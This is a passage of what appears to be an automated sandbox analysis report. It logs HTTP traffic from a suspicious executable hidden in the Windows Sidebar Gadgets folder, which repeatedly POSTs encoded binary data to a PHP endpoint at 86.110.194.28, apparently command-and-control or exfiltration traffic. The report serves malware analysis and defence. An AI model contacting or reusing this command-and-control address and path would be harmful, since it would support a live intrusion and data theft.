                                                                                                                                                                  Jan 3, 2025 09:09:20.970329046 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:20.970333099 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:20.970458031 CET805012486.110.194.28192.168.2.4

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • 86.110.194.28

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.44973286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:13.663677931 CET375OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 344
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:14.020428896 CET344OUTData Raw: 00 0b 04 00 06 00 04 01 05 06 02 01 02 04 01 01 00 0a 05 08 02 0d 03 0b 01 06 0c 06 06 04 03 04 0e 00 06 5b 00 03 07 03 0f 04 04 53 05 0b 05 06 03 00 0b 0f 0e 03 06 0a 04 07 04 06 04 52 06 09 02 04 0e 0b 05 54 01 01 0d 07 0f 06 0d 51 0f 09 06 00
                                                                                                                                                                  Data Ascii: [SRTQ\L~kY~@`Labu`~of]`BlMZ`IoRUocbkpcg]_je~V@@xS\Ab}
                                                                                                                                                                  Jan 3, 2025 09:07:14.375729084 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:14.471868992 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:14 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 1400
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 56 4a 7d 58 6c 43 7f 4a 78 5c 6b 5d 6b 62 74 5e 7e 67 55 41 7f 4e 6a 53 6d 63 74 4f 69 62 52 48 60 4d 57 0d 79 4f 71 4b 75 58 63 58 69 5b 78 01 55 4b 72 50 74 5c 67 07 68 61 6a 5f 6b 64 76 0a 78 66 70 0c 69 60 77 49 61 62 75 06 60 07 62 5d 7f 61 75 58 69 0a 67 51 7e 49 5e 5a 76 66 7b 06 7c 5c 53 02 69 63 69 00 6c 64 6b 59 6c 59 52 00 7b 53 78 5b 79 4c 5e 02 7b 63 72 06 7f 60 7f 5a 7b 77 5e 49 6a 5c 6f 05 75 61 60 04 7a 51 41 5b 68 59 67 52 7f 5f 7e 50 75 6c 52 03 6c 6c 74 00 60 5e 66 09 7a 71 5f 05 7d 6c 50 4e 7a 72 79 58 61 05 70 5a 76 5f 74 4f 74 71 7a 50 7e 5d 7a 06 77 61 7d 01 76 66 6f 50 7f 52 65 01 60 6f 6c 04 7f 4d 6f 5a 78 6f 64 5a 7a 60 65 5a 7c 6d 5a 08 76 67 6f 5e 69 61 7e 09 69 7e 7f 0c 6c 6d 7e 04 7d 72 66 5e 7b 5d 46 51 7f 6c 60 43 6a 63 64 40 7e 49 72 05 7a 6e 7c 5f 79 72 74 03 68 07 6b 00 7e 67 63 0b 7c 59 69 09 7a 4d 68 05 6a 5b 7c 48 76 63 57 51 7b 5c 79 02 75 66 68 03 7d 58 68 4f 7e 58 7d 09 76 62 59 00 7f 5c 79 01 7d 67 76 43 78 66 78 4f 7e 4d 59 04 75 62 75 04 76 71 53 00 7c 4f [TRUNCATED]
                                                                                                                                                                  Data Ascii: VJ}XlCJx\k]kbt^~gUANjSmctOibRH`MWyOqKuXcXi[xUKrPt\ghaj_kdvxfpi`wIabu`b]auXigQ~I^Zvf{|\SicildkYlYR{Sx[yL^{cr`Z{w^Ij\oua`zQA[hYgR_~PulRllt`^fzq_}lPNzryXapZv_tOtqzP~]zwa}vfoPRe`olMoZxodZz`eZ|mZvgo^ia~i~lm~}rf^{]FQl`Cjcd@~Irzn|_yrthk~gc|YizMhj[|HvcWQ{\yufh}XhO~X}vbY\y}gvCxfxO~MYubuvqS|OXH~BR@}YUJv_U{buH~pixI^LygtxmgzrVIxsT|p|{wpD}\g@u_VH}RgK|IhA|a_vBh{ltwN~zO}||j{_rHvMuOdNtqPC|Nft\mLu[pRit|xO|MhxB{J{prDCR@vg`A}bP~CszmTL~reM`t||^pt}Yrz}gD{bpHOgI}Yg`}{c`~b^wMeyaSIwvtK~HR@fawLgK}r}O|Ib{vR}]{wrqvqiOr}|t~wu_sxb_J}`SxYx{Ypy}YxrpxMzA{]NZoYcZj[oNvxI}|xZdxXmbU|o|]Z`aUyXmiUb_z\y\}b`g{ZL~JxYyZwb[MaeQQhoiBw|lh]cY{lgKxpjIh}|Ntdc]}LySzSYQa~infSqUPPoowTcIRdeXoTtT~cthm`[QtZUkcHNmFS~cX[p\RebFq[F[iv`~v}vahYkbaLdaTx_h|p`]a\qwXjZaTHilP]AZbdFVq@iTFnsXUkoYUcXx_|y]f~^|J{JK|r]^tv^ioEP{gVSb_aUPkxp_UPLvjQyD|\DXb`E[rMc[Liy[cTCZXpxSY]A{oSsAQA[oeEQ~AcUCh}TiZNWRy
                                                                                                                                                                  Jan 3, 2025 09:07:14.471879959 CET393INData Raw: 40 6a 71 65 5e 7d 5d 7b 77 65 6b 70 4a 79 59 55 54 51 00 75 47 51 6e 56 43 54 5a 08 48 6b 62 56 43 51 01 03 77 68 63 01 54 7d 5d 56 5c 64 5b 63 02 70 71 5c 4e 57 58 43 5a 74 71 7b 5c 69 65 08 40 52 7a 6e 56 58 61 07 55 6b 04 09 04 50 5d 61 40 53
                                                                                                                                                                  Data Ascii: @jqe^}]{wekpJyYUTQuGQnVCTZHkbVCQwhcT}]V\d[cpq\NWXCZtq{\ie@RznVXaUkP]a@SgwNipgYw_r`lLqCxXW]RwJTdVCZYZWnEW|rb^@l`pUdDVng]otubVslkxZu|YbbGQp`\Sd^kL\UCoohRnf}zSt|\DXb`E[rMc[Li}A[XjEZ\oMU}][ol\~^s|T|TwqqPno@Xd
                                                                                                                                                                  Jan 3, 2025 09:07:14.595175982 CET351OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 384
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:14.806215048 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:14.806637049 CET384OUTData Raw: 5b 5c 5e 51 58 5c 50 50 54 5b 59 5a 5b 56 57 53 5f 5d 5a 5a 52 56 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\^QX\PPT[YZ[VWS_]ZZRVPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&C(25<T&$@*+[$$\26"#+,Z3_;'?8S+#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:15.022274971 CET324INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:14 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 05 24 3b 00 11 3e 01 27 5b 25 1d 21 5f 35 30 2c 14 2f 30 2a 41 22 3f 22 06 31 5d 33 0c 3f 3d 00 0a 2b 0a 26 0e 20 3e 03 52 2b 1a 28 5d 03 10 39 11 2b 04 33 59 28 2e 22 05 2e 19 23 14 33 09 01 00 2a 0a 2d 1e 26 2c 39 0e 21 13 01 1d 3d 23 26 06 30 05 3b 07 3c 1e 0e 06 25 3d 20 54 0b 17 24 0f 24 1e 2f 58 25 28 08 02 29 27 37 00 26 3a 03 1a 22 2f 2a 1a 34 39 20 5e 3b 33 36 0a 30 06 3a 0e 3e 3d 3f 1d 26 2a 22 58 30 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '$;>'[%!_50,/0*A"?"1]3?=+& >R+(]9+3Y(.".#3*-&,9!=#&0;<%= T$$/X%()'7&:"/*49 ^;360:>=?&*"X0;.\#(U4WP
                                                                                                                                                                  Jan 3, 2025 09:07:15.029629946 CET351OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 384
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:15.240533113 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:15.240725040 CET384OUTData Raw: 5b 5c 5b 5b 5d 5e 50 5e 54 5b 59 5a 5b 55 57 5d 5f 55 5a 5c 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\[[]^P^T[YZ[UW]_UZ\R]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+.5,1(;'B>%,9P")Q7$(D0Y<R<)#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:07:15.456553936 CET324INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 13 25 3b 22 5a 28 3c 2f 1d 25 1d 0f 13 36 33 27 04 2f 23 32 43 21 12 0f 58 26 05 0e 51 3c 03 0b 1c 2b 30 3a 08 20 3e 39 57 28 20 28 5d 03 10 3a 04 3d 3d 24 00 2a 3d 25 15 2e 51 3b 5b 33 09 2b 01 29 30 26 0e 31 02 29 0e 36 13 2c 0a 29 23 26 03 33 38 24 16 3c 33 2c 01 24 2d 20 54 0b 17 27 54 24 0e 3f 5e 26 28 0b 5a 29 09 28 12 30 3a 39 57 35 3c 3d 08 23 39 0a 5b 38 09 29 52 25 38 0f 57 3e 2d 37 1e 25 2a 3d 00 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $%;"Z(</%63'/#2C!X&Q<+0: >9W( (]:==$*=%.Q;[3+)0&1)6,)#&38$<3,$- T'T$?^&(Z)(0:9W5<=#9[8)R%8W>-7%*=&;.\#(U4WP
                                                                                                                                                                  Jan 3, 2025 09:07:15.457134008 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 1452
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:15.668015957 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:15.668198109 CET1452OUTData Raw: 5e 50 5e 59 58 59 50 51 54 5b 59 5a 5b 51 57 58 5f 5d 5a 54 52 5c 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P^YXYPQT[YZ[QWX_]ZTR\P@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+.&!'1)[04)\2<)"7*4((Z0)<'Y8<)#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:16.043838978 CET324INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 05 26 2b 2d 02 3d 3f 09 5e 31 30 2a 02 21 23 33 00 2f 30 00 40 35 5a 35 12 31 5d 24 57 3c 5b 29 1b 3c 20 31 1d 37 3e 3e 0c 3f 30 28 5d 03 10 3a 01 3f 3d 3c 01 3d 07 25 5c 2d 34 23 5c 25 34 3f 05 2b 20 2e 0f 25 05 2a 1f 21 03 0d 53 3e 55 25 59 24 05 05 03 2b 0e 2c 02 30 07 20 54 0b 17 27 57 33 30 09 59 25 06 04 05 29 0e 3c 5a 30 14 2a 0b 22 2c 3e 56 37 29 28 16 2d 20 0b 57 25 28 2a 0b 2a 58 33 1d 25 39 21 02 27 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '&+-=?^10*!#3/0@5Z51]$W<[)< 17>>?0(]:?=<=%\-4#\%4?+ .%*!S>U%Y$+,0 T'W30Y%)<Z0*",>V7)(- W%(**X3%9!';.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.44973586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:14.673593998 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:15.019939899 CET2576OUTData Raw: 5b 57 5b 5c 5d 5a 55 5b 54 5b 59 5a 5b 51 57 5d 5f 53 5a 5e 52 54 50 41 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W[\]ZU[T[YZ[QW]_SZ^RTPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+*5;2')=%$&Y>!4($)$+)#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:15.367511034 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:15.498719931 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.44973786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:15.907654047 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:16.254221916 CET2576OUTData Raw: 5e 52 5e 5a 5d 5d 50 5a 54 5b 59 5a 5b 54 57 5f 5f 52 5a 58 52 52 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R^Z]]PZT[YZ[TW__RZXRRPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D(2")/2? @)+^'4[%"7%T7;,$<@$/#))#Y'$X.-
                                                                                                                                                                  Jan 3, 2025 09:07:16.602940083 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:16.846651077 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:16 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T
                                                                                                                                                                  Jan 3, 2025 09:07:16.951261044 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:16 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.44973986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:19.449095964 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:19.801594973 CET2568OUTData Raw: 5b 57 5e 5a 58 59 50 5b 54 5b 59 5a 5b 57 57 5f 5f 55 5a 54 52 52 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^ZXYP[T[YZ[WW__UZTRRPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<5#)#$,/>;>$-&/V6B5#4X'9B'Y8?#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:20.151932001 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:20.285936117 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:20 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.44974086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:21.065151930 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:21.410518885 CET2052OUTData Raw: 5b 53 5e 58 5d 5e 55 58 54 5b 59 5a 5b 50 57 5f 5f 54 5a 54 52 51 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [S^X]^UXT[YZ[PW__TZTRQPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?%"\/&Z#>.Z$&%<:6%#8\$9;3/$V(9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:21.763943911 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:21.892483950 CET324INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:21 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 58 31 02 29 01 29 3c 3b 59 27 33 00 07 22 30 2f 07 3b 23 36 08 36 02 35 5a 32 3b 30 56 3c 2d 2d 1d 3c 30 3e 0c 23 3d 3e 0e 29 30 28 5d 03 10 39 5d 3f 04 34 01 2a 00 39 5c 3a 0e 23 14 30 24 27 05 2a 20 3d 54 27 2c 29 0d 21 2d 3f 55 29 30 25 5e 24 2b 05 02 3c 56 2b 58 33 17 20 54 0b 17 27 1d 33 23 30 02 32 06 08 03 28 27 15 03 27 2a 0f 57 22 12 35 08 23 07 3b 06 2c 56 22 0f 24 2b 2a 0f 29 2e 37 54 24 29 3d 02 33 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $X1))<;Y'3"0/;#665Z2;0V<--<0>#=>)0(]9]?4*9\:#0$'* =T',)!-?U)0%^$+<V+X3 T'3#02(''*W"5#;,V"$+*).7T$)=3+.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.44974186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:21.503123999 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:21.848068953 CET2576OUTData Raw: 5e 52 5b 5f 58 5b 50 5a 54 5b 59 5a 5b 53 57 5a 5f 53 5a 5b 52 57 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R[_X[PZT[YZ[SWZ_SZ[RWPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<--5 S1*;$>%Y:!4*#(438@'/<#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:22.209737062 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:22.341129065 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:22 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.44974586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:26.900568962 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
